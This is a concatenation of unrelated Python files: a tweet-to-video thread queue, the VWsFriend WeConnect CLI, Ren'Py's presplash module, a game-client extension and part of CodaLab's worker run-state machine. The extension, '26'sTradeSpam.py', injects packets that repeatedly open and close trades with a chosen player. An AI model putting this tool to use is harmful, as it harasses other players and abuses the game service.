if __name__ == "__main__":
print(query_memory())
|
queue_sys.py
|
#!/usr/bin/env python3
# ===================================================================================
# Copyright @2020 Yanyu Zhang zhangya@bu.edu
# HW4 : Build queue system
# ===================================================================================
import queue
from tweepy_get import tweepy_get
from image2video import image_to_video
import multiprocessing
import time
import threading
def queue_1(keyNames, number_thread):
def worker():
i = 0
while True:
item = q.get()
if item is None:
print("Break ! Because item is None")
break
tweepy_get(item)
image_to_video(item)
i += 1
print("---------------Thread Done--------------")
q.task_done()
q = queue.Queue()
threads = []
for i in range(number_thread):
t = threading.Thread(target=worker)
t.start()
threads.append(t)
for item in keyNames:
q.put(item)
q.join()
for i in range(number_thread):
q.put(None)
for t in threads:
t.join()
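if __name__ == "__main__":
    # Hedged usage sketch (hypothetical keywords): fetch tweets and build videos for two search
    # terms with four worker threads; queue_1 blocks until every queued item has been processed.
    queue_1(["boston", "weather"], number_thread=4)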
|
vwsfriend.py
|
import os
import sys
import re
import argparse
from datetime import datetime, timedelta, timezone
import logging
import time
import tempfile
import netrc
import getpass
import threading
from pyhap.accessory_driver import AccessoryDriver
from weconnect import weconnect
from weconnect.__version import __version__ as __weconnect_version__
from vwsfriend.ui.vwsfriend_ui import VWsFriendUI
from vwsfriend.homekit.bridge import VWsFriendBridge
from vwsfriend.agent_connector import AgentConnector
from vwsfriend.homekit.custom_characteristics import CUSTOM_CHARACTERISTICS
from .__version import __version__
LOG_LEVELS = ["DEBUG", "INFO", "WARNING", "ERROR", "CRITICAL"]
DEFAULT_LOG_LEVEL = "ERROR"
LOG = logging.getLogger("VWsFriend")
class NumberRangeArgument:
def __init__(self, imin=None, imax=None):
self.imin = imin
self.imax = imax
def __call__(self, arg):
try:
value = int(arg)
except ValueError as e:
raise self.exception() from e
if (self.imin is not None and value < self.imin) or (self.imax is not None and value > self.imax):
raise self.exception()
return value
def exception(self):
if self.imin is not None and self.imax is not None:
return argparse.ArgumentTypeError(f'Must be a number from {self.imin} to {self.imax}')
if self.imin is not None:
return argparse.ArgumentTypeError(f'Must be a number not smaller than {self.imin}')
if self.imax is not None:
            return argparse.ArgumentTypeError(f'Must be a number not larger than {self.imax}')
return argparse.ArgumentTypeError('Must be a number')
def main(): # noqa: C901 pylint: disable=too-many-branches, too-many-statements, too-many-locals
parser = argparse.ArgumentParser(
prog='vwsfriend',
description='TBD')
parser.add_argument('--version', action='version',
version='%(prog)s {version} (using WeConnect-python {weversion})'.format(version=__version__, weversion=__weconnect_version__))
weConnectGroup = parser.add_argument_group('WeConnect')
weConnectGroup.add_argument('-u', '--username', help='Username of Volkswagen id', required=False)
weConnectGroup.add_argument('-p', '--password', help='Password of Volkswagen id', required=False)
defaultNetRc = os.path.join(os.path.expanduser("~"), ".netrc")
weConnectGroup.add_argument('--netrc', help=f'File in netrc syntax providing login (default: {defaultNetRc}).'
' Netrc is only used when username and password are not provided as arguments',
default=None, required=False)
weConnectGroup.add_argument('-i', '--interval', help='Query interval in seconds',
type=NumberRangeArgument(imin=300), required=False, default=300)
defaultTemp = os.path.join(tempfile.gettempdir(), 'weconnect.token')
weConnectGroup.add_argument('--tokenfile', help=f'file to store token (default: {defaultTemp})', default=defaultTemp)
weConnectGroup.add_argument('--no-token-storage', dest='noTokenStorage', help='Do not store token on filesystem (this'
                                ' will cause a new login for every invocation!)', action='store_true')
parser.add_argument('-v', '--verbose', action="append_const", const=-1,)
parser.add_argument('--config-dir', dest='configDir', help='directory to store configuration files (default: ./)', default='./')
parser.add_argument('--demo', help='folder containing demo scenario, see README for more information')
dbGroup = parser.add_argument_group('Database & visualization')
dbGroup.add_argument('--with-database', dest='withDatabase', help='Connect VWsFriend to database for visualization', action='store_true')
dbGroup.add_argument('--database-url', dest='dbUrl', help='Database to connect to', default='sqlite:///vwsfrienddevel.db')
abrpGroup = parser.add_argument_group('ABRP: A better route planner')
abrpGroup.add_argument('--with-abrp', dest='withABRP', help='Connect VWsFriend to ABRP (you need to add userTokens in the UI!)', action='store_true')
homekitGroup = parser.add_argument_group('Homekit')
homekitGroup.add_argument('--with-homekit', dest='withHomekit', help='Provide Apple Homekit functionality', action='store_true')
args = parser.parse_args()
logLevel = LOG_LEVELS.index(DEFAULT_LOG_LEVEL)
for adjustment in args.verbose or ():
logLevel = min(len(LOG_LEVELS) - 1, max(logLevel + adjustment, 0))
logging.basicConfig(level=LOG_LEVELS[logLevel])
logging.getLogger("pyhap").setLevel(level="CRITICAL")
# logging.getLogger('sqlalchemy.engine').setLevel(logging.INFO)
LOG.info('vwsfriend %s (using WeConnect-python %s)', __version__, __weconnect_version__)
username = None
password = None
if args.username is not None and args.password is not None:
username = args.username
password = args.password
else:
if args.netrc is not None:
netRcFilename = args.netrc
else:
netRcFilename = defaultNetRc
try:
secrets = netrc.netrc(file=args.netrc)
username, _, password = secrets.authenticators("volkswagen.de")
except TypeError:
if not args.username:
LOG.error('volkswagen.de entry was not found in %s netrc-file. Create it or provide at least a username'
' with --username', netRcFilename)
sys.exit(1)
username = args.username
password = getpass.getpass()
except FileNotFoundError:
if not args.username:
LOG.error('%s netrc-file was not found. Create it or provide at least a username with --username',
netRcFilename)
sys.exit(1)
username = args.username
password = getpass.getpass()
tokenfile = None
if not args.noTokenStorage:
tokenfile = args.tokenfile
try:
weConnect = weconnect.WeConnect(username=username, password=password, tokenfile=tokenfile,
updateAfterLogin=False, loginOnInit=(args.demo is None))
connector = AgentConnector(weConnect=weConnect, dbUrl=args.dbUrl, interval=args.interval, withDB=args.withDatabase, withABRP=args.withABRP,
configDir=args.configDir)
driver = None
if args.withHomekit:
LOG.info('Starting up Homekit')
# Start the accessory on port 51826
driver = AccessoryDriver(pincode=None, persist_file=f'{args.configDir}/accessory.state')
for characteristicKey, characteristic in CUSTOM_CHARACTERISTICS.items():
driver.loader.char_types[characteristicKey] = characteristic
bridge = VWsFriendBridge(driver=driver, weConnect=weConnect, accessoryConfigFile=f'{args.configDir}/accessory.config')
driver.add_accessory(bridge)
weConnectBridgeInitialized = False
# Start it!
hapThread = threading.Thread(target=driver.start)
hapThread.start()
ui = VWsFriendUI(weConnect=weConnect, connector=connector, homekitDriver=driver, dbUrl=args.dbUrl)
ui.run()
if args.demo is not None:
utcDemoStart = datetime.utcnow().replace(tzinfo=timezone.utc, microsecond=0)
for file in sorted(os.listdir(args.demo)):
fileNameRegex = r'(?P<number>\d+)_(?P<delay>\d+)s(_(?P<stage>[^\.]+))?.cache.json'
match = re.search(fileNameRegex, file)
if match is not None:
time.sleep(int(match.groupdict()['delay']))
stageFilePath = f'{args.demo}/{file}'
with open(stageFilePath, mode='r', encoding='utf8') as fp:
cacheString = fp.read()
cacheString = re.sub(r'demodate\((?P<offset>[+-]?\d+)\)',
lambda m: str(utcDemoStart + timedelta(seconds=int(m.groupdict()['offset']))).replace('+00:00', 'Z'), cacheString)
cacheString = re.sub(r'now\((?P<offset>[+-]?\d+)\)',
lambda m: str(datetime.now() + timedelta(seconds=int(m.groupdict()['offset']))), cacheString)
weConnect.fillCacheFromJsonString(cacheString, maxAge=2147483647)
if args.withHomekit and not weConnectBridgeInitialized:
weConnectBridgeInitialized = True
bridge.update()
weConnect.update(updateCapabilities=True)
connector.commit()
if match.groupdict()['stage'] is not None:
LOG.info('Stage %s completed', match.groupdict()['stage'])
else:
LOG.info('Stage completed')
LOG.info('Demo completed')
else:
while True:
try:
LOG.info('Updating data from WeConnect')
weConnect.update(updateCapabilities=True, updatePictures=True, force=True)
connector.commit()
if args.withHomekit and not weConnectBridgeInitialized:
weConnectBridgeInitialized = True
bridge.update()
except weconnect.RetrievalError:
LOG.error('Retrieval error during update. Will try again after configured interval of %ds', args.interval)
time.sleep(args.interval)
except weconnect.AuthentificationError as e:
LOG.critical('There was a problem when authenticating with WeConnect: %s', e)
except weconnect.APICompatibilityError as e:
LOG.critical('There was a problem when communicating with WeConnect.'
' If this problem persists please open a bug report: %s', e)
|
presplash.py
|
# Copyright 2004-2018 Tom Rothamel <pytom@bishoujo.us>
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
# Pre-splash code. The goal of this code is to try to get a pre-splash
# screen up as soon as possible, to let the user know something is
# going on.
from __future__ import print_function
import threading
import pygame_sdl2
import os.path
import sys
import time
import renpy
# The window.
window = None
# Should the event thread keep running?
keep_running = False
# The start time.
start_time = time.time()
PRESPLASHEVENT = pygame_sdl2.event.register("PRESPLASHEVENT")
def run_event_thread():
"""
Disposes of events while the window is running.
"""
pygame_sdl2.time.set_timer(PRESPLASHEVENT, 20)
while keep_running:
pygame_sdl2.event.wait()
pygame_sdl2.time.set_timer(PRESPLASHEVENT, 0)
def start(basedir, gamedir):
"""
Called to display the presplash when necessary.
"""
if "RENPY_LESS_UPDATES" in os.environ:
return
filenames = [ "/presplash.png", "/presplash.jpg" ]
for fn in filenames:
fn = gamedir + fn
if os.path.exists(fn):
break
else:
return
if renpy.windows:
import ctypes
from ctypes import c_void_p, c_int
ctypes.windll.user32.SetProcessDPIAware()
pygame_sdl2.display.init()
img = pygame_sdl2.image.load(fn, fn)
global window
bounds = pygame_sdl2.display.get_display_bounds(0)
sw, sh = img.get_size()
x = bounds[0] + bounds[2] // 2 - sw // 2
y = bounds[1] + bounds[3] // 2 - sh // 2
window = pygame_sdl2.display.Window(
sys.argv[0],
img.get_size(),
flags=pygame_sdl2.WINDOW_BORDERLESS,
pos=(x, y))
img = img.convert_alpha(window.get_surface())
window.get_surface().blit(img, (0, 0))
window.update()
global event_thread
event_thread = threading.Thread(target=run_event_thread)
event_thread.daemon = True
event_thread.start()
global start_time
start_time = time.time()
def end():
"""
Called just before we initialize the display to hide the presplash.
"""
global keep_running
global event_thread
global window
if window is None:
return
keep_running = False
event_thread.join()
window.destroy()
window = None
def sleep():
"""
Sleep to the end of config.minimum_presplash_time.
"""
if not (window or renpy.mobile):
return
remaining = start_time + renpy.config.minimum_presplash_time - time.time()
if remaining > 0:
time.sleep(remaining)
|
26'sTradeSpam.py
|
import sys
from g_python.gextension import Extension
from g_python.hmessage import Direction
from time import sleep
import threading
extension_info = {
"title": "26'sTradeSpam",
"description": "ts: on&off&cho ",
"version": "0.2",
"author": "funkydemir66"
}
ext = Extension(extension_info, sys.argv, silent=True)
ext.start()
KATMER = "OpenTrading"
KASAR = "CloseTrading"
kod = ""
sec_kod = sc = False
def konusma(msj):
global sc, sec_kod
def main():
while sc:
for i in range(256):
if sc:
ext.send_to_server('{out:'+str(KATMER)+'}{i:'+str(kod)+'}')
sleep(0.1)
ext.send_to_server('{out:'+str(KASAR)+'}')
sleep(0.1)
text = msj.packet.read_string()
if text == ':ts cho':
msj.is_blocked = True
sec_kod = True
ext.send_to_client('{in:Chat}{i:123456789}{s:"Open a trade to the player you want to trade spam with "}{i:0}{i:30}{i:0}{i:0}')
if text == ':ts on':
msj.is_blocked = True
sc = True
thread = threading.Thread(target=main)
thread.start()
ext.send_to_client('{in:Chat}{i:123456789}{s:"Script: on "}{i:0}{i:30}{i:0}{i:0}')
if text == ':ts off':
msj.is_blocked = True
sc = False
ext.send_to_client('{in:Chat}{i:123456789}{s:"Script: off "}{i:0}{i:30}{i:0}{i:0}')
def yukle_kod(p):
global kod, sec_kod
if sec_kod:
sec_kod = False
user_id, _, _ = p.packet.read("iii")
kod = str(user_id)
ext.send_to_client('{in:Chat}{i:123456789}{s:"idd: saved "}{i:0}{i:30}{i:0}{i:0}')
ext.intercept(Direction.TO_SERVER, konusma, 'Chat')
ext.intercept(Direction.TO_SERVER, yukle_kod, 'OpenTrading')
|
worker_run_state.py
|
import docker
import glob
import logging
import os
import threading
import time
import traceback
import codalab.worker.docker_utils as docker_utils
from collections import namedtuple
from pathlib import Path
from codalab.lib.formatting import size_str, duration_str
from codalab.worker.file_util import remove_path, get_path_size, path_is_parent
from codalab.worker.bundle_state import State, DependencyKey
from codalab.worker.fsm import DependencyStage, StateTransitioner
from codalab.worker.worker_thread import ThreadDict
logger = logging.getLogger(__name__)
class RunStage(object):
"""
    Defines the finite set of possible stages and transition functions.
    Note that it is important that each stage can be re-executed
    without unintended adverse effects (re-execution happens when a worker resumes).
"""
WORKER_STATE_TO_SERVER_STATE = {}
"""
This stage involves setting up the directory structure for the run
and preparing to start the container
"""
PREPARING = 'RUN_STAGE.PREPARING'
WORKER_STATE_TO_SERVER_STATE[PREPARING] = State.PREPARING
"""
Running encompasses the state where the user's job is running
"""
RUNNING = 'RUN_STAGE.RUNNING'
WORKER_STATE_TO_SERVER_STATE[RUNNING] = State.RUNNING
"""
This stage encompasses cleaning up intermediary components like
the dependency symlinks and also the releasing of dependencies
"""
CLEANING_UP = 'RUN_STAGE.CLEANING_UP'
WORKER_STATE_TO_SERVER_STATE[CLEANING_UP] = State.RUNNING
"""
Uploading results means the job's results are getting uploaded to the server
"""
UPLOADING_RESULTS = 'RUN_STAGE.UPLOADING_RESULTS'
WORKER_STATE_TO_SERVER_STATE[UPLOADING_RESULTS] = State.RUNNING
"""
Finalizing means the worker is finalizing the bundle metadata with the server
"""
FINALIZING = 'RUN_STAGE.FINALIZING'
WORKER_STATE_TO_SERVER_STATE[FINALIZING] = State.FINALIZING
"""
Finished means the worker is done with this run
"""
FINISHED = 'RUN_STAGE.FINISHED'
WORKER_STATE_TO_SERVER_STATE[FINISHED] = State.READY
"""
    This stage will collect bundles in terminal states and
    send them back to the server in the RESTAGED state
"""
RESTAGED = 'RUN_STAGE.RESTAGED'
WORKER_STATE_TO_SERVER_STATE[RESTAGED] = State.STAGED
RunState = namedtuple(
'RunState',
[
'stage', # RunStage
'run_status', # str
'bundle', # BundleInfo
'bundle_path', # str
'bundle_dir_wait_num_tries', # Optional[int]
'resources', # RunResources
'bundle_start_time', # int
'container_time_total', # int
'container_time_user', # int
'container_time_system', # int
'container', # Optional[docker.Container]
'container_id', # Optional[str]
'docker_image', # Optional[str]
'is_killed', # bool
'has_contents', # bool
'cpuset', # Optional[Set[str]]
'gpuset', # Optional[Set[str]]
'max_memory', # int
'disk_utilization', # int
        'exitcode', # Optional[str]
'failure_message', # Optional[str]
'kill_message', # Optional[str]
'finished', # bool
'finalized', # bool
'is_restaged', # bool
'cpu_usage', # float
'memory_usage', # float
'bundle_profile_stats', # dict
'paths_to_remove', # list[str]. Stores paths to be removed after the worker run.
],
)
"""Dependency that is mounted.
TODO(Ashwin): document this better
docker_path - path on the Docker container where the dependency is mounted
example (shared file system): /0x0fbb927dc0e54544bbc2d439a6805951/foo
example (non-shared file system): .../codalab-worksheets/var/codalab/worker/dependencies/0x6b5bfdca99b6423ea36327102b19d0af
child_path - path inside the bundle folder from where the dependency is mounted
example (shared file system): .../codalab-worksheets/var/codalab/home/partitions/default/bundles/0x0fbb927dc0e54544bbc2d439a6805951/foo
example (non-shared file system): .../codalab-worksheets/var/codalab/home/partitions/default/bundles/0x0fbb927dc0e54544bbc2d439a6805951/foo
parent_path - path of the dependency
example (shared file system): /opt/codalab-worksheets/tests/files/a.txt
example (non-shared file system): .../codalab-worksheets/var/codalab/worker/dependencies/0x6b5bfdca99b6423ea36327102b19d0af
"""
DependencyToMount = namedtuple('DependencyToMount', 'docker_path, child_path, parent_path')
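# Hedged illustration (hypothetical paths, not part of the original module): on a non-shared file
# system, a dependency mounted at the top level of a bundle could be described like this.
_EXAMPLE_DEPENDENCY_TO_MOUNT = DependencyToMount(
    docker_path='/0x0fbb927dc0e54544bbc2d439a6805951_dependencies/foo',
    child_path='/var/codalab/bundles/0x0fbb927dc0e54544bbc2d439a6805951/foo',
    parent_path='/var/codalab/worker/dependencies/0x6b5bfdca99b6423ea36327102b19d0af',
)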
def log_bundle_transition(
bundle_uuid: str,
previous_stage: str,
next_stage: str,
reason: str = '',
level: int = logging.INFO,
):
info = f'Bundle {bundle_uuid} is transitioning from {previous_stage} to {next_stage}'
if reason != '':
info = f'{info}. Reason: {reason}'
logger.log(level=level, msg=info)
if level >= logging.ERROR:
logger.error(traceback.format_exc())
class RunStateMachine(StateTransitioner):
"""
Manages the state machine of the runs running on the local machine
Note that in general there are two types of errors:
- User errors (fault of bundle) - we fail the bundle (move to CLEANING_UP state).
- System errors (fault of worker) - we freeze this worker (Exception is thrown up).
It's not always clear where the line is.
"""
_ROOT = '/'
_CURRENT_DIRECTORY = '.'
RESTAGED_REASON = 'The bundle is not in terminal states {READY, FAILED, KILLED} when the worker checks termination'
def __init__(
self,
image_manager, # Component to request docker images from
dependency_manager, # Component to request dependency downloads from
worker_docker_network, # Docker network to add all bundles to
docker_network_internal, # Docker network to add non-net connected bundles to
docker_network_external, # Docker network to add internet connected bundles to
docker_runtime, # Docker runtime to use for containers (nvidia or runc)
upload_bundle_callback, # Function to call to upload bundle results to the server
assign_cpu_and_gpu_sets_fn, # Function to call to assign CPU and GPU resources to each run
shared_file_system, # If True, bundle mount is shared with server
shared_memory_size_gb, # Shared memory size for the run container (in GB)
):
super(RunStateMachine, self).__init__()
self.add_transition(RunStage.PREPARING, self._transition_from_PREPARING)
self.add_transition(RunStage.RUNNING, self._transition_from_RUNNING)
self.add_transition(RunStage.CLEANING_UP, self._transition_from_CLEANING_UP)
self.add_transition(RunStage.UPLOADING_RESULTS, self._transition_from_UPLOADING_RESULTS)
self.add_transition(RunStage.FINALIZING, self._transition_from_FINALIZING)
self.add_terminal(RunStage.FINISHED)
self.add_terminal(RunStage.RESTAGED)
self.dependency_manager = dependency_manager
self.image_manager = image_manager
self.worker_docker_network = worker_docker_network
self.docker_network_external = docker_network_external
self.docker_network_internal = docker_network_internal
# todo aditya: docker_runtime will be None if the worker is a singularity worker. handle this.
self.docker_runtime = docker_runtime
# bundle.uuid -> {'thread': Thread, 'run_status': str}
self.uploading = ThreadDict(fields={'run_status': 'Upload started', 'success': False})
# bundle.uuid -> {'thread': Thread, 'disk_utilization': int, 'running': bool}
self.disk_utilization = ThreadDict(
fields={'disk_utilization': 0, 'running': True, 'lock': None}
)
self.upload_bundle_callback = upload_bundle_callback
self.assign_cpu_and_gpu_sets_fn = assign_cpu_and_gpu_sets_fn
self.shared_file_system = shared_file_system
self.shared_memory_size_gb = shared_memory_size_gb
def stop(self):
for uuid in self.disk_utilization.keys():
self.disk_utilization[uuid]['running'] = False
self.disk_utilization.stop()
self.uploading.stop()
def _transition_from_PREPARING(self, run_state):
"""
1- Request the docker image from docker image manager
- if image is failed, move to CLEANING_UP state
2- Request the dependencies from dependency manager
- if any are failed, move to CLEANING_UP state
3- If all dependencies and docker image are ready:
- Set up the local filesystem for the run
- Create symlinks to dependencies
- Allocate resources and prepare the docker container
- Start the docker container
4- If all is successful, move to RUNNING state
"""
def mount_dependency(dependency, shared_file_system):
if not shared_file_system:
# Set up symlinks for the content at dependency path
Path(dependency.child_path).parent.mkdir(parents=True, exist_ok=True)
os.symlink(dependency.docker_path, dependency.child_path)
# The following will be converted into a Docker volume binding like:
# dependency_path:docker_dependency_path:ro
docker_dependencies.append((dependency.parent_path, dependency.docker_path))
if run_state.is_killed or run_state.is_restaged:
log_bundle_transition(
bundle_uuid=run_state.bundle.uuid,
previous_stage=run_state.stage,
next_stage=RunStage.CLEANING_UP,
reason=f'the bundle was {"killed" if run_state.is_killed else "restaged"}',
)
return run_state._replace(stage=RunStage.CLEANING_UP)
# Check CPU and GPU availability
try:
cpuset, gpuset = self.assign_cpu_and_gpu_sets_fn(
run_state.resources.cpus, run_state.resources.gpus
)
except Exception as e:
message = "Unexpectedly unable to assign enough resources to bundle {}: {}".format(
run_state.bundle.uuid, str(e)
)
logger.error(message)
logger.error(traceback.format_exc())
return run_state._replace(run_status=message)
dependencies_ready = True
status_messages = []
if not self.shared_file_system:
# No need to download dependencies if we're in the shared FS,
# since they're already in our FS
for dep in run_state.bundle.dependencies:
dep_key = DependencyKey(dep.parent_uuid, dep.parent_path)
dependency_state = self.dependency_manager.get(run_state.bundle.uuid, dep_key)
if dependency_state.stage == DependencyStage.DOWNLOADING:
status_messages.append(
'Downloading dependency %s: %s done (archived size)'
% (dep.child_path, size_str(dependency_state.size_bytes))
)
dependencies_ready = False
elif dependency_state.stage == DependencyStage.FAILED:
# Failed to download dependency; -> CLEANING_UP
log_bundle_transition(
bundle_uuid=run_state.bundle.uuid,
previous_stage=run_state.stage,
next_stage=RunStage.CLEANING_UP,
reason=f'Dependency has failed for this bundle. Dependency child uuid: {dep.child_uuid}. Dependency child path: {dep.child_path}',
)
return run_state._replace(
stage=RunStage.CLEANING_UP,
failure_message='Failed to download dependency %s: %s'
% (dep.child_path, dependency_state.message),
)
# get the docker image
docker_image = run_state.resources.docker_image
image_state = self.image_manager.get(docker_image)
if image_state.stage == DependencyStage.DOWNLOADING:
status_messages.append(
'Pulling docker image %s %s' % (docker_image, image_state.message)
)
dependencies_ready = False
elif image_state.stage == DependencyStage.FAILED:
# Failed to pull image; -> CLEANING_UP
message = 'Failed to download Docker image: %s' % image_state.message
logger.error(message)
return run_state._replace(stage=RunStage.CLEANING_UP, failure_message=message)
# stop proceeding if dependency and image downloads aren't all done
if not dependencies_ready:
status_message = status_messages.pop()
if status_messages:
                status_message += " (and downloading %d other dependencies and docker images)" % len(
status_messages
)
logger.info(
f'bundle is not ready yet. uuid: {run_state.bundle.uuid}. status message: {status_message}'
)
return run_state._replace(run_status=status_message)
# All dependencies ready! Set up directories, symlinks and container. Start container.
# 1) Set up a directory to store the bundle.
if self.shared_file_system:
if not os.path.exists(run_state.bundle_path):
if run_state.bundle_dir_wait_num_tries == 0:
                    message = (
                        "Bundle directory cannot be found on the shared filesystem. "
                        "Please ensure the shared filesystem between the server and "
                        "your worker is mounted properly or contact your administrators."
)
log_bundle_transition(
bundle_uuid=run_state.bundle.uuid,
previous_stage=run_state.stage,
next_stage=RunStage.CLEANING_UP,
reason="Bundle directory cannot be found on the shared filesystem.",
)
return run_state._replace(stage=RunStage.CLEANING_UP, failure_message=message)
next_bundle_dir_wait_num_tries = run_state.bundle_dir_wait_num_tries - 1
logger.info(
f'Waiting for bundle directory to be created by the server, uuid: {run_state.bundle.uuid}, bundle_dir_wait_num_tries: {next_bundle_dir_wait_num_tries}'
)
return run_state._replace(
run_status="Waiting for bundle directory to be created by the server",
bundle_dir_wait_num_tries=next_bundle_dir_wait_num_tries,
)
else:
remove_path(run_state.bundle_path)
os.makedirs(run_state.bundle_path)
# 2) Set up symlinks
docker_dependencies = []
docker_dependencies_path = (
RunStateMachine._ROOT
+ run_state.bundle.uuid
+ ('_dependencies' if not self.shared_file_system else '')
)
for dep in run_state.bundle.dependencies:
full_child_path = os.path.normpath(os.path.join(run_state.bundle_path, dep.child_path))
to_mount = []
dependency_path = self._get_dependency_path(run_state, dep)
if dep.child_path == RunStateMachine._CURRENT_DIRECTORY:
# Mount all the content of the dependency_path to the top-level of the bundle
for child in os.listdir(dependency_path):
child_path = os.path.normpath(os.path.join(run_state.bundle_path, child))
to_mount.append(
DependencyToMount(
docker_path=os.path.join(docker_dependencies_path, child),
child_path=child_path,
parent_path=os.path.join(dependency_path, child),
)
)
run_state = run_state._replace(
paths_to_remove=(run_state.paths_to_remove or []) + [child_path]
)
else:
to_mount.append(
DependencyToMount(
docker_path=os.path.join(docker_dependencies_path, dep.child_path),
child_path=full_child_path,
parent_path=dependency_path,
)
)
first_element_of_path = Path(dep.child_path).parts[0]
if first_element_of_path == RunStateMachine._ROOT:
run_state = run_state._replace(
paths_to_remove=(run_state.paths_to_remove or []) + [full_child_path]
)
else:
# child_path can be a nested path, so later remove everything from the first element of the path
path_to_remove = os.path.join(run_state.bundle_path, first_element_of_path)
run_state = run_state._replace(
paths_to_remove=(run_state.paths_to_remove or []) + [path_to_remove]
)
for dependency in to_mount:
try:
mount_dependency(dependency, self.shared_file_system)
except OSError as e:
log_bundle_transition(
bundle_uuid=run_state.bundle.uuid,
previous_stage=run_state.stage,
next_stage=RunStage.CLEANING_UP,
reason=str(e.__class__),
level=logging.ERROR,
)
return run_state._replace(stage=RunStage.CLEANING_UP, failure_message=str(e))
if run_state.resources.network:
docker_network = self.docker_network_external.name
else:
docker_network = self.docker_network_internal.name
# 3) Start container
try:
container = docker_utils.start_bundle_container(
run_state.bundle_path,
run_state.bundle.uuid,
docker_dependencies,
run_state.bundle.command,
run_state.resources.docker_image,
network=docker_network,
cpuset=cpuset,
gpuset=gpuset,
memory_bytes=run_state.resources.memory,
runtime=self.docker_runtime,
shared_memory_size_gb=self.shared_memory_size_gb,
)
self.worker_docker_network.connect(container)
except docker_utils.DockerUserErrorException as e:
message = 'Cannot start Docker container: {}'.format(e)
log_bundle_transition(
bundle_uuid=run_state.bundle.uuid,
previous_stage=run_state.stage,
next_stage=RunStage.CLEANING_UP,
reason='Cannot start Docker container.',
level=logging.ERROR,
)
return run_state._replace(stage=RunStage.CLEANING_UP, failure_message=message)
except Exception as e:
message = 'Cannot start container: {}'.format(e)
logger.error(message)
logger.error(traceback.format_exc())
raise
return run_state._replace(
stage=RunStage.RUNNING,
run_status='Running job in container',
container_id=container.id,
container=container,
docker_image=image_state.digest,
has_contents=True,
cpuset=cpuset,
gpuset=gpuset,
)
def _get_dependency_path(self, run_state, dependency):
if self.shared_file_system:
# TODO(Ashwin): make this not fs-specific.
# On a shared FS, we know where the dependency is stored and can get the contents directly
return os.path.realpath(os.path.join(dependency.location, dependency.parent_path))
else:
# On a dependency_manager setup, ask the manager where the dependency is
dep_key = DependencyKey(dependency.parent_uuid, dependency.parent_path)
return os.path.join(
self.dependency_manager.dependencies_dir,
self.dependency_manager.get(run_state.bundle.uuid, dep_key).path,
)
def _transition_from_RUNNING(self, run_state):
"""
1- Check run status of the docker container
2- If run is killed, kill the container
3- If run is finished, move to CLEANING_UP state
"""
def check_and_report_finished(run_state):
try:
finished, exitcode, failure_msg = docker_utils.check_finished(run_state.container)
except docker_utils.DockerException:
logger.error(traceback.format_exc())
finished, exitcode, failure_msg = False, None, None
return run_state._replace(
finished=finished, exitcode=exitcode, failure_message=failure_msg
)
def check_resource_utilization(run_state: RunState):
logger.info(f'Checking resource utilization for bundle. uuid: {run_state.bundle.uuid}')
cpu_usage, memory_usage = docker_utils.get_container_stats_with_docker_stats(
run_state.container
)
run_state = run_state._replace(cpu_usage=cpu_usage, memory_usage=memory_usage)
kill_messages = []
run_stats = docker_utils.get_container_stats(run_state.container)
run_state = run_state._replace(
max_memory=max(run_state.max_memory, run_stats.get('memory', 0))
)
run_state = run_state._replace(
disk_utilization=self.disk_utilization[run_state.bundle.uuid]['disk_utilization']
)
container_time_total = docker_utils.get_container_running_time(run_state.container)
run_state = run_state._replace(
container_time_total=container_time_total,
container_time_user=run_stats.get(
'container_time_user', run_state.container_time_user
),
container_time_system=run_stats.get(
'container_time_system', run_state.container_time_system
),
)
if run_state.resources.time and container_time_total > run_state.resources.time:
kill_messages.append(
'Time limit exceeded. (Container uptime %s > time limit %s)'
% (duration_str(container_time_total), duration_str(run_state.resources.time))
)
if run_state.max_memory > run_state.resources.memory or run_state.exitcode == 137:
kill_messages.append(
'Memory limit %s exceeded.' % size_str(run_state.resources.memory)
)
if run_state.resources.disk and run_state.disk_utilization > run_state.resources.disk:
kill_messages.append(
'Disk limit %sb exceeded.' % size_str(run_state.resources.disk)
)
if kill_messages:
run_state = run_state._replace(kill_message=' '.join(kill_messages), is_killed=True)
return run_state
def check_disk_utilization():
logger.info(f'Checking disk utilization for bundle. uuid: {run_state.bundle.uuid}')
running = True
while running:
start_time = time.time()
try:
disk_utilization = get_path_size(run_state.bundle_path)
self.disk_utilization[run_state.bundle.uuid][
'disk_utilization'
] = disk_utilization
running = self.disk_utilization[run_state.bundle.uuid]['running']
except Exception:
logger.error(traceback.format_exc())
end_time = time.time()
# To ensure that we don't hammer the disk for this computation when
# there are lots of files, we run it at most 10% of the time.
time.sleep(max((end_time - start_time) * 10, 1.0))
self.disk_utilization.add_if_new(
run_state.bundle.uuid, threading.Thread(target=check_disk_utilization, args=[])
)
run_state = check_and_report_finished(run_state)
run_state = check_resource_utilization(run_state)
if run_state.is_killed or run_state.is_restaged:
log_bundle_transition(
bundle_uuid=run_state.bundle.uuid,
previous_stage=run_state.stage,
next_stage=RunStage.CLEANING_UP,
reason=f'the bundle was {"killed" if run_state.is_killed else "restaged"}',
)
if docker_utils.container_exists(run_state.container):
try:
run_state.container.kill()
except docker.errors.APIError:
finished, _, _ = docker_utils.check_finished(run_state.container)
if not finished:
logger.error(traceback.format_exc())
self.disk_utilization[run_state.bundle.uuid]['running'] = False
self.disk_utilization.remove(run_state.bundle.uuid)
return run_state._replace(stage=RunStage.CLEANING_UP)
if run_state.finished:
logger.debug(
'Finished run with UUID %s, exitcode %s, failure_message %s',
run_state.bundle.uuid,
run_state.exitcode,
run_state.failure_message,
)
self.disk_utilization[run_state.bundle.uuid]['running'] = False
self.disk_utilization.remove(run_state.bundle.uuid)
return run_state._replace(stage=RunStage.CLEANING_UP, run_status='Uploading results')
else:
